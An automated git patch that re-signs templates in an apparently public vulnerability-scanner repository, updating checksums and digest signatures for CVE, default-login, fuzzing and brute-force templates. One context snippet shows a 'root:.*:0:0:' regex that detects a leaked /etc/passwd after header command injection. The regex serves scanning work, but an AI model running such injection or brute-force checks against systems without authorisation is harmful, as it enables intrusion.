@@ -3206,7 +3206,7 @@ http/default-logins/ofbiz/ofbiz-default-login.yaml:2e6eea7863853fca0a5546a479d43 http/default-logins/openemr/openemr-default-login.yaml:e47d165fc7a306238827e4ea1497307f932890cd http/default-logins/openmediavault/openmediavault-default-login.yaml:efb418987e7a7b80b6fc9ea78f883b4dcaa90efe http/default-logins/oracle/businessintelligence-default-login.yaml:29309871b052bb3f05de613e838dadb92dd47f79 -http/default-logins/oracle/peoplesoft-default-login.yaml:6ee288c848a0c5a046e206b7f245a50f886e72d6 +http/default-logins/oracle/peoplesoft-default-login.yaml:5da182e00f57e6927f30674cde5f7bae9de6bbd4 http/default-logins/others/aruba-instant-default-login.yaml:398f77a4e4e01153465c51bdfeb3cf53f670a85b http/default-logins/others/ciphertrust-default-login.yaml:9d29315f7fd68f1e4f55dd046bf7c716658ef13e http/default-logins/others/cnzxsoft-default-login.yaml:71898b0928c2f380612addb0350fb686dd84e025 @@ -3292,7 +3292,7 @@ http/exposed-panels/acunetix-panel.yaml:b10cd9d4a29dea26e161ddeb85b6b920efd69870 http/exposed-panels/addonfinance-portal.yaml:38506f2dd6a3a69108a50fe67a2686af99398590 http/exposed-panels/adhoc-transfer-panel.yaml:dcce7565c43f4ea78e2a3ad9fc8216f301f05c94 http/exposed-panels/adiscon-loganalyzer.yaml:fc2432f93a3fd7724c3f0d2814d41c065e0b8b21 -http/exposed-panels/adminer-panel-detect.yaml:e1426681f4d6c9e2502bc10a2327e73b6fa9113e +http/exposed-panels/adminer-panel-detect.yaml:89f3dfcb1a75493cc7d806df52ee64b3e65450fa http/exposed-panels/adminer-panel.yaml:b266fbab664e4ee130429e725409cf78000739e0 http/exposed-panels/adminset-panel.yaml:2be3fbb1ec0fe028405fdb0353163d1352a14d65 http/exposed-panels/adobe/adobe-component-login.yaml:ca846d96566ad14a055b85c15bd2b61e3a786d8d 
@@ -4340,7 +4340,7 @@ http/exposures/apis/wadl-api.yaml:7a728eb7a4cb779218d582661a7fb2978abedc03 http/exposures/apis/wsdl-api.yaml:e28378d37cb724e50ad74e13158210a704a2d9df http/exposures/backups/exposed-mysql-initial.yaml:546b26c48697aa27b99c9d385c509b1af10e8907 http/exposures/backups/froxlor-database-backup.yaml:a8296d723d545dea6b9d898766db58cc8f06c984 -http/exposures/backups/php-backup-files.yaml:6af27377a944a299aee9bf4c4dbd8b60b99b8224 +http/exposures/backups/php-backup-files.yaml:505b1da333d78f3266443cab2fa4f9a6e57d6635 http/exposures/backups/settings-php-files.yaml:4deb7ac78c1f7df72c6efad11c7ce77373c3ba7b http/exposures/backups/sql-dump.yaml:e989e8b4ad56b0ed996c7dc9cec7eab2210c223c http/exposures/backups/zip-backup-files.yaml:0b4309555d6a4f0fee56b49d302d209baccb808e 
@@ -4822,19 +4822,19 @@ http/exposures/tokens/zendesk/zendesk-key.yaml:002e66de48b921b1485a90c9ee0b8202d http/exposures/tokens/zenserp/zenscrape-api-key.yaml:a8b850b2efaae638efc02b5d207fe6bc855610e9 http/exposures/tokens/zenserp/zenserp-api-key.yaml:dc1d18779abf2831c2b624b8cebad22f57bad735 http/exposures/tokens/zoho/zoho-webhook-token.yaml:213408cbf1610741f4f31da89e8dba8f3d5b20eb -http/fuzzing/cache-poisoning-fuzz.yaml:0dea0da9f14667463434dd2938455cb041e9de7a -http/fuzzing/header-command-injection.yaml:f35e69a5b540b432355364ce314be23d0dfe72de -http/fuzzing/iis-shortname.yaml:878ffbd680260e7de82515ae139572b9d076ba40 -http/fuzzing/linux-lfi-fuzzing.yaml:6d09bdb021b1d2f04197a1afcb5566f94c345578 -http/fuzzing/mdb-database-file.yaml:44368401b80d528a53411419188d8654cc01092a -http/fuzzing/prestashop-module-fuzz.yaml:1770351eb8024ad210d1773b851f15a92f523bf6 -http/fuzzing/ssrf-via-proxy.yaml:67a0e37236d363d42d148494ee00f3fb55372ce3 -http/fuzzing/valid-gmail-check.yaml:5322234e7caccea4fe57c3ec8ea7e5b6b91317e6 -http/fuzzing/waf-fuzz.yaml:6b9237448f006d60291634510ac4d910fb73ca0c -http/fuzzing/wordpress-plugins-detect.yaml:3bb133a2a5af6333133a4d1afc69b7253325e071 -http/fuzzing/wordpress-themes-detect.yaml:81452a0c2201364547a722b3268c3cc9be19fbad -http/fuzzing/wordpress-weak-credentials.yaml:3688f4121a6862a3ec2177a0c28c6f0aaea1cfe8 -http/fuzzing/xff-403-bypass.yaml:3988407398c98a0f521e0251aafe2738470ed895 +http/fuzzing/cache-poisoning-fuzz.yaml:55b0174b93ae85bcd2a5bd8dae8d5f2ee6dc183c +http/fuzzing/header-command-injection.yaml:531a6bae6185a29c431f42e8f2d0e4931ec82d05 +http/fuzzing/iis-shortname.yaml:3b02c03dfa0000145db4e569e9894ae9f9bfe4e0 +http/fuzzing/linux-lfi-fuzzing.yaml:98fb1f938fadd7dbef664b4fb90f70340998090d +http/fuzzing/mdb-database-file.yaml:f10257c4e4200709619934b82ad68db7c8ddf918 +http/fuzzing/prestashop-module-fuzz.yaml:7dad3e5599c90ca0dd227bebde42d56d3dc4fe8d +http/fuzzing/ssrf-via-proxy.yaml:61406c0b18b887b8b0820c01ccb006f25a8febf2 
+http/fuzzing/valid-gmail-check.yaml:a9ddd0375c3160a61a5f2387c1113b9b64df8879 +http/fuzzing/waf-fuzz.yaml:d748d662ef552cee252b45d68017a09286c6eb93 +http/fuzzing/wordpress-plugins-detect.yaml:6a6a62082132ee13694282e8b77818db20ae5e64 +http/fuzzing/wordpress-themes-detect.yaml:bac6070c72b0db61adc5945ec1b14326c766cd14 +http/fuzzing/wordpress-weak-credentials.yaml:31dff20ca524cae856476baac860a09fd9a536ed +http/fuzzing/xff-403-bypass.yaml:debf58b69daf4676a60aba8af99fd6dc99df1d7d http/honeypot/citrix-honeypot-detect.yaml:a632cb08a12e2d3dfe69f8b4e8d0cbd4d44cbbc5 http/honeypot/dionaea-http-honeypot-detect.yaml:7830d2af83e16b50c0a4b647defe89c9ac5efe25 http/honeypot/elasticpot-honeypot-detect.yaml:73cb47452335d2c4e95f07bdbaabcb7800b634aa @@ -4895,7 +4895,7 @@ http/miscellaneous/balada-injector-malware.yaml:46e26d3735f737c251df9a46d7091f3d http/miscellaneous/clientaccesspolicy.yaml:f1ce4622fb979da2754ffba7bf52cdfe3fc470d0 http/miscellaneous/crypto-mining-malware.yaml:10c82a94c2cf226eb22b8ac8e10dc88d8aa24387 http/miscellaneous/defaced-website-detect.yaml:045ede38b93611039e21dc0f249ddebf3a5499e5 -http/miscellaneous/defacement-detect.yaml:b1ec2272ff1ecfdfa21cf8bec5620e26d325817e +http/miscellaneous/defacement-detect.yaml:4bb02fec3ec11dcb407a956be1fc2f0a6bcc9897 http/miscellaneous/detect-dns-over-https.yaml:46b316a9632c17d9cf75cbb27de9c706c9a14b0b http/miscellaneous/dir-listing.yaml:dad3bf5aa871745ab62bf6f4b61909bde637e326 http/miscellaneous/email-extractor.yaml:5815f093718b70c0b64c4c423cd1ec8ab94f1281 
@@ -4912,7 +4912,7 @@ http/miscellaneous/maxforwards-headers-detect.yaml:9d69555c1fc58f644b5ccf2644e0a http/miscellaneous/microsoft-azure-error.yaml:bfa3c53d4023d524a09ba3565bd3bf63204ac58a http/miscellaneous/moodle-changelog.yaml:9dbf59caabecc08967456fa3986046e33f4dbf43 http/miscellaneous/netflix-conductor-version.yaml:31ad2c649ff4aa0703a5c7cd4e36d2245a8993e0 -http/miscellaneous/ntlm-directories.yaml:5f40ea6a1dda6cd8654e61902adb60b877945de5 +http/miscellaneous/ntlm-directories.yaml:8d2b0ffc05206f993712a9bbd94071107bcda074 http/miscellaneous/old-copyright.yaml:de816764aefeaf59f75201740f4f82fb31071194 http/miscellaneous/options-method.yaml:2e0edc5993baa53c6fb7e8307c80ea26254bc3e4 http/miscellaneous/rdap-whois.yaml:c25cfe8b61f82c032de77398cf1aed94f56f0004 @@ -4958,7 +4958,7 @@ http/misconfiguration/aem/aem-secrets.yaml:346f23f7070fdf59c2c76fddd12a5eb4f31c7 http/misconfiguration/aem/aem-security-users.yaml:ff974be49aaee03897db4a6d40117b9e5d02598d http/misconfiguration/aem/aem-setpreferences-xss.yaml:dd08fc188a7ad278c8ee3082b66d9d2282d1c9e8 http/misconfiguration/aem/aem-sling-userinfo.yaml:f38274749b0668275a6b8cdddc2707bbde9eb1a0 -http/misconfiguration/aem/aem-userinfo-servlet.yaml:ad12a83b873c3e1bd09b0b675368f78013a26261 +http/misconfiguration/aem/aem-userinfo-servlet.yaml:47c5ab71db4a7fde4c72b30d1c273f2dc2e637b9 http/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml:cc07ee10590df2dd7de1d03c73167bbd4d81b95b http/misconfiguration/aem/aem-xss-childlist-selector.yaml:a9ecdb229a17db9192821a583549813a1bb1fc3c http/misconfiguration/airflow/airflow-debug.yaml:c18746cecd6f440d9367f6ebe1ce70ff34e508af 
@@ -5073,7 +5073,7 @@ http/misconfiguration/gitlab/gitlab-public-repos.yaml:1a2b426983d0ca449461a9ece3 http/misconfiguration/gitlab/gitlab-public-signup.yaml:f604c8044baffdf63ed2215ccec5b5721202144b http/misconfiguration/gitlab/gitlab-public-snippets.yaml:64aa47f34d185b8bbbc04b242eb0a76886d641ec http/misconfiguration/gitlab/gitlab-uninitialized-password.yaml:d9959b940359896de41142fe765303a3627c7ae5 -http/misconfiguration/gitlab/gitlab-user-enum.yaml:f3372fa8a631a0249e5a108ac8e2d610a5a6ec71 +http/misconfiguration/gitlab/gitlab-user-enum.yaml:899a8a3e6898f4898986bb1bda5e248b360bd427 http/misconfiguration/gitlist-disclosure.yaml:8111ac3c10bc09b42d9c2bc565cd5758cb6a220e http/misconfiguration/global-traffic-statistics.yaml:f5ab7750ae4d32d8b857b8290bcd98ac1358fa0d http/misconfiguration/glpi-directory-listing.yaml:29bb88890e78f83428d00799224679dfd993e1bc 
@@ -5320,9 +5320,9 @@ http/misconfiguration/proxy/metadata-hetzner.yaml:99b85a4199e83eff23ec416b6b6fff http/misconfiguration/proxy/metadata-openstack.yaml:6e1984d2e3aa87e07e6b7db80dbd7c9d10c9d417 http/misconfiguration/proxy/metadata-oracle.yaml:93d94888c382735e755c96a1908859778f1308ef http/misconfiguration/proxy/open-proxy-external.yaml:e05b7e6f0744ee250192e9167a89b4d6c7dfdee1 -http/misconfiguration/proxy/open-proxy-internal.yaml:198c9a37e2ddb668d66fb1598d5f73784dca1a24 -http/misconfiguration/proxy/open-proxy-localhost.yaml:2a876eb905cbd8591af8d8c7cb8494fd2db314e9 -http/misconfiguration/proxy/open-proxy-portscan.yaml:10aaa6234f8c68a346e226e5bc615de2134ac10e +http/misconfiguration/proxy/open-proxy-internal.yaml:5de892d38ee34977924d4eb2cbd644b4b51fe567 +http/misconfiguration/proxy/open-proxy-localhost.yaml:4cd4b2b6c999578dff79a1d9d0aab65b759db464 +http/misconfiguration/proxy/open-proxy-portscan.yaml:e4806af440f78fced0b1239e83f9a5b440c4b4ee http/misconfiguration/puppetdb-dashboard.yaml:5b1f354f5ab9343e46a20bd7c76a8ee044cf71b4 http/misconfiguration/put-method-enabled.yaml:4cbb1715aeb73cf6e638b02c9951ff02c7a67756 http/misconfiguration/python-metrics.yaml:0b1d1102e4329ebf75ae5cc259898f1cb1cd9670 @@ -6447,7 +6447,7 @@ http/technologies/google-frontend-httpserver.yaml:de094bfafe3b5aea16e1bffb3ab80c http/technologies/graphiql-detect.yaml:a50e33498f73c5c27694fdad64d7d5f06dc1fe29 http/technologies/graphql-detect.yaml:a0566e15058b3aeb2d4dae77cc99d23355938dac http/technologies/grav-cms-detect.yaml:f353a0fa76204ccd1c894aa850f977fef8c769f1 -http/technologies/graylog/graylog-api-exposure.yaml:5a677a5db5ed943770e6f6a1c2cf4e6e8f947b36 +http/technologies/graylog/graylog-api-exposure.yaml:c669347801d0d2a1ec1f100228f4f48e99f28dd9 http/technologies/graylog-api-browser.yaml:5aaa8bff99b57cf700d0923b48778048789f2389 http/technologies/gunicorn-detect.yaml:4e32fda7d9483af8c21fd3ea7fa6669266e23d0d http/technologies/hanwang-detect.yaml:4866144f96b1fbc18567e10ad7732b8a1a8dfc5f 
@@ -7702,7 +7702,7 @@ http/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml:63ec56f7d http/vulnerabilities/tongda/tongda-action-uploadfile.yaml:26127f055c9c3ffa79366002ca95ea0c80a9c1dc http/vulnerabilities/tongda/tongda-api-file-upload.yaml:868bdf72215e96c1c0b2f2a4e68ecefa98bf453c http/vulnerabilities/tongda/tongda-arbitrary-login.yaml:813a5228a57a292be77d48351f979e9b4ce4bdcc -http/vulnerabilities/tongda/tongda-auth-bypass.yaml:4fd1922eebdd4690602da2a46f2db2aafdfcef26 +http/vulnerabilities/tongda/tongda-auth-bypass.yaml:f661e567e8d9b51bdf29cc07155b552b92beab20 http/vulnerabilities/tongda/tongda-contact-list-exposure.yaml:d1d9be064a074860683581a4e84f8e85a3abfc27 http/vulnerabilities/tongda/tongda-getdata-rce.yaml:b4452e0abc9faa89378a2d6b14c6ef99eddbb56d http/vulnerabilities/tongda/tongda-getway-rfi.yaml:02cae92f443ca026546155a79f51aab073d2a0dd @@ -7944,7 +7944,7 @@ http/vulnerabilities/wordpress/wp-vault-lfi.yaml:12ee639ae8dd7fb66560ac713aab3a4 http/vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml:d36b1dafca4c01fbc15d17c4e884144f36974304 http/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml:9cd53ef3a743e970ff37c36b2c9640781d578878 http/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml:0e1c6d447132c374e620d553de2cd8a8468f917e -http/vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml:f19c8ecb61fc6cb7a1d1c1f94898be756d976779 +http/vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml:9d1201fd282d799868a36ce2c49476f8c146711e http/vulnerabilities/wordpress/wp-xmlrpc-pingback-detection.yaml:f72f913987c22ad251d6b4b09e10fe57f20f0727 http/vulnerabilities/wordpress/wp-xmlrpc.yaml:b55a9ba158dc74c9797ce3cddb6464bf48106074 http/vulnerabilities/wordpress/wp-yoast-user-enumeration.yaml:ec8dd93cf0c3f663465b7191136013def01f5d0f 
@@ -7985,13 +7985,13 @@ http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml:daa2040c8238fbe51311e7ac http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml:80348e0fda22d428224a9a62afae01b8380694a0 http/vulnerabilities/zzzcms/zzzcms-xss.yaml:61a6fd65556054e8e2a631080388aff7aed42f6b javascript/cves/2016/CVE-2016-8706.yaml:823829801f090b3c8aa0b65a21f506da440cb2a0 -javascript/cves/2023/CVE-2023-34039.yaml:99873aefa26ca441bdea56e83f1433ddc11054c4 +javascript/cves/2023/CVE-2023-34039.yaml:15973462461926ddb4e6991f45579aa54ae7fc29 javascript/cves/2023/CVE-2023-46604.yaml:5f4409197ba9dd7f86ae5de4beb6409ce7f1bfb8 javascript/cves/2024/CVE-2024-23897.yaml:2de4bb803c9ebd5e8a989cc1760102ea53ee95d3 javascript/default-logins/mssql-default-logins.yaml:b95502ea9632648bc430c61995e3d80d0c46f161 javascript/default-logins/postgres-default-logins.yaml:0b960d1c695d009536b0846c5a393731d3fac7ad javascript/default-logins/redis-default-logins.yaml:f9a03987fac4e8150d9b8d5ab80779c6f41d8b7f -javascript/default-logins/ssh-default-logins.yaml:18115e88843b935c771139ba788aa321a8a8e75b +javascript/default-logins/ssh-default-logins.yaml:63a239d5a020912bf1e33b4ff59606e25181afe3 javascript/detection/mssql-detect.yaml:3dad2c227b904cc228247a86bf0372c5b2544b94 javascript/detection/oracle-tns-listener.yaml:3d274f668de183b62c79c04782bf0740150b4423 javascript/detection/ssh-auth-methods.yaml:7240dac7d7ee80f4aebf95f7ddf7a540874adf04 
@@ -8136,10 +8136,10 @@ network/misconfig/erlang-daemon.yaml:5360cef90f48dc3c6bdab6df6e44245f243f423c network/misconfig/ganglia-xml-grid-monitor.yaml:dac3b1babe27265e34d19b1bac7388d65f89281b network/misconfig/memcached-stats.yaml:18844aac24b0279e3bb974baccf32256d5482109 network/misconfig/mongodb-unauth.yaml:0a25bf55d5fedd1b56c397ae27e93483018ae16a -network/misconfig/mysql-native-password.yaml:214396d10e5a824362e0184c365b862581629394 +network/misconfig/mysql-native-password.yaml:a9f7b3791ec021bec37c88303be460decc98069f network/misconfig/printers-info-leak.yaml:3eaf0fc4e07c21308b3bd7f387f2f6765979ad15 network/misconfig/sap-router-info-leak.yaml:a7ebbd8a06f5add2a3ded6259da9b3b3b5e0f005 -network/misconfig/tidb-native-password.yaml:140577255bfbe46ab1c88e594405a34b889a56f8 +network/misconfig/tidb-native-password.yaml:cee939c1ed6cf22fbd0fc3d2d6b4047ab02a5fa0 network/misconfig/tidb-unauth.yaml:5c00fa571b47b099a046afc2a7ff5aba4bfd20fd network/misconfig/unauth-psql.yaml:4234beb83e518739f430de109340c402c96a3740 network/vulnerabilities/clockwatch-enterprise-rce.yaml:3b34549e3d1b3ddcddab7a8cdfd7b9c57c8f2d37 @@ -8170,7 +8170,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:f6eaac90af8e77b23be2e3482cf5afbd3b015566 +templates-checksum.txt:59b8ce63bd6dd7ced361b025574c2da600135edb wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 2ede6795a64558bc26b2a6b5455a12888608f8ba Mon Sep 17 00:00:00 2001 
From: GitHub Action Date: Tue, 19 Mar 2024 16:40:41 +0000 Subject: [PATCH 16/86] Auto Template Signing [Tue Mar 19 16:40:41 UTC 2024] :robot: --- cloud/enum/azure-vm-cloud-enum.yaml | 2 +- http/cves/2017/CVE-2017-17562.yaml | 2 +- http/cves/2019/CVE-2019-17382.yaml | 2 +- http/cves/2022/CVE-2022-2034.yaml | 2 +- http/cves/2022/CVE-2022-2599.yaml | 2 +- http/cves/2023/CVE-2023-24489.yaml | 2 +- http/default-logins/oracle/peoplesoft-default-login.yaml | 2 +- http/exposed-panels/adminer-panel-detect.yaml | 2 +- http/exposures/backups/php-backup-files.yaml | 2 +- http/fuzzing/cache-poisoning-fuzz.yaml | 2 +- http/fuzzing/header-command-injection.yaml | 2 +- http/fuzzing/iis-shortname.yaml | 2 +- http/fuzzing/linux-lfi-fuzzing.yaml | 2 +- http/fuzzing/mdb-database-file.yaml | 2 +- http/fuzzing/prestashop-module-fuzz.yaml | 2 +- http/fuzzing/ssrf-via-proxy.yaml | 2 +- http/fuzzing/valid-gmail-check.yaml | 2 +- http/fuzzing/waf-fuzz.yaml | 2 +- http/fuzzing/wordpress-plugins-detect.yaml | 2 +- http/fuzzing/wordpress-themes-detect.yaml | 2 +- http/fuzzing/wordpress-weak-credentials.yaml | 2 +- http/fuzzing/xff-403-bypass.yaml | 2 +- http/miscellaneous/defacement-detect.yaml | 2 +- http/miscellaneous/ntlm-directories.yaml | 2 +- http/misconfiguration/aem/aem-userinfo-servlet.yaml | 2 +- http/misconfiguration/gitlab/gitlab-user-enum.yaml | 2 +- http/misconfiguration/proxy/open-proxy-internal.yaml | 2 +- http/misconfiguration/proxy/open-proxy-localhost.yaml | 2 +- http/misconfiguration/proxy/open-proxy-portscan.yaml | 2 +- http/technologies/graylog/graylog-api-exposure.yaml | 2 +- http/vulnerabilities/tongda/tongda-auth-bypass.yaml | 2 +- http/vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml | 2 +- javascript/cves/2023/CVE-2023-34039.yaml | 2 +- javascript/default-logins/ssh-default-logins.yaml | 2 +- network/misconfig/mysql-native-password.yaml | 2 +- network/misconfig/tidb-native-password.yaml | 2 +- 36 files changed, 36 insertions(+), 36 deletions(-) 
diff --git a/cloud/enum/azure-vm-cloud-enum.yaml b/cloud/enum/azure-vm-cloud-enum.yaml index 62be7fe992..87785a91a7 100644 --- a/cloud/enum/azure-vm-cloud-enum.yaml +++ b/cloud/enum/azure-vm-cloud-enum.yaml @@ -63,4 +63,4 @@ dns: part: answer words: - "IN\tA" -# digest: 4a0a00473045022100ad529d9d011c813ce7e0cb419a8440ca3f0bef3ca063b85560dbc678d6eb7056022022aa46f55179a7b72c6a02dcda0444e0aba98ddaa781c8118d39acd5cafdeaaf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200614bd35195e042742d9840244b46d9f68e4918956d5672a7549edaedbfe5f2e022051271716ac72339c39f76569585c0a256b19ce6238da5e3ea6a9d36b2d80011e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-17562.yaml b/http/cves/2017/CVE-2017-17562.yaml index a19b300778..131d83b131 100644 --- a/http/cves/2017/CVE-2017-17562.yaml +++ b/http/cves/2017/CVE-2017-17562.yaml @@ -117,4 +117,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100dec8b43170cf34ed98fbf83c8dc09389ffefda9fd823a123f509f32dbb63cc570220638e59f0bec3b3ab5a49d51408722e58ca5276e415dfaa2cb4821b2c65b295ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220121da3e7b07d35d6cc36396744f512a33ad3dc1ba36b7f99975e68d99f7950e50220073fc66cac1e0ba2aba9a53106e851591967dd64abdeb8b4d199284261e0417d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-17382.yaml b/http/cves/2019/CVE-2019-17382.yaml index babc75564f..4df57d8acb 100644 --- a/http/cves/2019/CVE-2019-17382.yaml +++ b/http/cves/2019/CVE-2019-17382.yaml 
@@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220626b2ab1255806a015af4a5a877b4cc26870eaa35262c5980d85b262263b2bad022029a7a7154e81df1a32ffc290eadfb2dfe71fd5c7dc9fbadbf4bc92c421ea6a48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206e060526ed498e58aeb165e1a86c6dfb0f822270df28b1f37de9879abeb9453502205623412e5aa23b5444d28233dc3a09dd053b5d8c1d4138adc4bd5cf524207012:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2034.yaml b/http/cves/2022/CVE-2022-2034.yaml index 81846921c0..feb23e7198 100644 --- a/http/cves/2022/CVE-2022-2034.yaml +++ b/http/cves/2022/CVE-2022-2034.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207c51a21553085f96246b9b7a7b8fcb17455c8ede92140fc56ac74b94c60b3fcf022054295c2dbda0cd3975caa9c8ac89cd1d99b8f237e8fe3258e096d29e53f99f61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220495ab4eeb68248ce94758f27eab64434c32477db41d51efff29e248a0bee54a102204decc78a0d04e9931c1440579656391f3cd9c5e45d86f0b672c44c99bc942d72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2599.yaml b/http/cves/2022/CVE-2022-2599.yaml index 71cb695804..fc99092981 100644 --- a/http/cves/2022/CVE-2022-2599.yaml +++ b/http/cves/2022/CVE-2022-2599.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100eef0f765c6118556853d7fbe2dacb78f2e80b4b820d56e883878df1688544eb402205baf46c82ff1df66387173dd365185b8a1517ac070ededd1288d324488f2b15a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022059cd96c86ae45ea4aa0ae09c6c3740e9225be1edfbafa84a38473cad7830094d022100e1627acd2f09e5f64cb1285bd45bad4f3b7d95657dff74b6310bbcfdcf01c8c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/http/cves/2023/CVE-2023-24489.yaml b/http/cves/2023/CVE-2023-24489.yaml index 84207995d6..8a0e8a9801 100644 --- a/http/cves/2023/CVE-2023-24489.yaml +++ b/http/cves/2023/CVE-2023-24489.yaml @@ -60,4 +60,4 @@ http: - type: dsl dsl: - 'BaseURL+ "/cifs/" + fileName + ".aspx"' -# digest: 4a0a00473045022100d934886760e9ccd26b8fc8bb22de25e8dd46427d5b1b2c0773a84cba9646446002206093910f6613687b25b29229ba4f688d9a5721012f2691c8079cdcc61a203332:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205da7cab8d8af553734b5f1c9203e90944a89fecdb12b73130bd97a508abf49bb022024325216beeb52a5e651a6cc678fc4dfa622158a1a0535f6464bb780be2f111a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/oracle/peoplesoft-default-login.yaml b/http/default-logins/oracle/peoplesoft-default-login.yaml index 5efacaf70e..101d43d24e 100644 --- a/http/default-logins/oracle/peoplesoft-default-login.yaml +++ b/http/default-logins/oracle/peoplesoft-default-login.yaml @@ -82,4 +82,4 @@ http: - type: status status: - 302 -# digest: 490a00463044022050a7ba41878e766a7453e20f034e337465bb2c7e07eda9ce12ec916ed28df2d202205e97d0b986bb626f7127189fc4f889109ba9f20801a5a72cc406f9e6dcf5db4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022021caed0d7676a38577b2c3d3b6a6549f5bcb9942d4b96265587f639ae486006502203ec6b9e3cce73f65f0aaffe2ae6ea2835d44c5431bd579f08d3fe2450ccedb74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/adminer-panel-detect.yaml b/http/exposed-panels/adminer-panel-detect.yaml index 8f3282ffe1..6778f37ea0 100644 --- a/http/exposed-panels/adminer-panel-detect.yaml +++ b/http/exposed-panels/adminer-panel-detect.yaml 
@@ -53,4 +53,4 @@ http: group: 1 regex: - '([0-9.]+)' -# digest: 4a0a00473045022100ee20baf11aa5604db68aa1754dd077e912192bd19c3e3586c7442a697f6ac22102204c689729457b6f71c285dfe1309b72f23ba46b69516e80c2baaad9b20bd4b77a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d1fcc4e636bdb5f3961f4541594d60ac0dc86688a2cda52de2530fbf4ca9b770022100d68508fb2d73378f62f821365ccc2f11f063da2ae73ded7792159a9a1c97e373:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/backups/php-backup-files.yaml b/http/exposures/backups/php-backup-files.yaml index a6fba70644..ca54085937 100644 --- a/http/exposures/backups/php-backup-files.yaml +++ b/http/exposures/backups/php-backup-files.yaml @@ -136,4 +136,4 @@ http: - "text/plain" - "bytes" condition: or -# digest: 4b0a00483046022100c733de0ef40feb46f3e0d6ba5996c622340ad6910a6ea85e9c1c4e8aa1939cd2022100b73afbe7b608bdd57d018fe31bdc23a620f2e6b965916193232c840782ef90d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022019ff7dd3ceced23dec05a238feaf346674305dde6a4a6613b965cf8d0500acfc02210092bbcbb84d7180e46714712507b6e6b108317250bc01d99b3d8eee50b2d7f393:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/fuzzing/cache-poisoning-fuzz.yaml b/http/fuzzing/cache-poisoning-fuzz.yaml index 9e0174b891..df817453b6 100644 --- a/http/fuzzing/cache-poisoning-fuzz.yaml +++ b/http/fuzzing/cache-poisoning-fuzz.yaml 
@@ -34,4 +34,4 @@ http: - 'contains(body_1, "{{randstr}}")' - 'contains(body_2, "{{randstr}}")' condition: and -# digest: 4b0a00483046022100bba6a80d36a07519a4f1b8528ccff3881319bdcd199c51e9d78c319e8832cac8022100f86715b3dbd1438e11a557d63175be67feddc557a7e0bbfcfa6c1b764a48aa0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100893d371d193cc0f4111cf8b61a2d092bf7820039aa9a6eecf49529c0d59ac41702201b80bdfb4007c9173b4cff9a55590cf605b0918021c8bbd96b3cc0294ecd5124:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/fuzzing/header-command-injection.yaml b/http/fuzzing/header-command-injection.yaml index 9863e8e4b0..076ec7b5ac 100644 --- a/http/fuzzing/header-command-injection.yaml +++ b/http/fuzzing/header-command-injection.yaml @@ -39,4 +39,4 @@ http: - type: regex regex: - "root:.*:0:0:" -# digest: 4a0a0047304502203dfb9d94713bdd57f01a1037a1a475e92c22c7f2917019840a194b6d93960fe5022100d2d94c46b98286546a9bd02fe1229a1fb36b8d4e40d0dd981d1ad31662ab0a3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022044f5c4ce901be80e947968eba35f25a3f9606a5cd8936480fd0cf89bde3edf4f022041fe2163a6b12dcb07d1e872f3051eb642e9b10dcf52f59d3e5a9a8107cf7434:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/fuzzing/iis-shortname.yaml b/http/fuzzing/iis-shortname.yaml index d6da7ac5b6..743eaa51ed 100644 --- a/http/fuzzing/iis-shortname.yaml +++ b/http/fuzzing/iis-shortname.yaml 
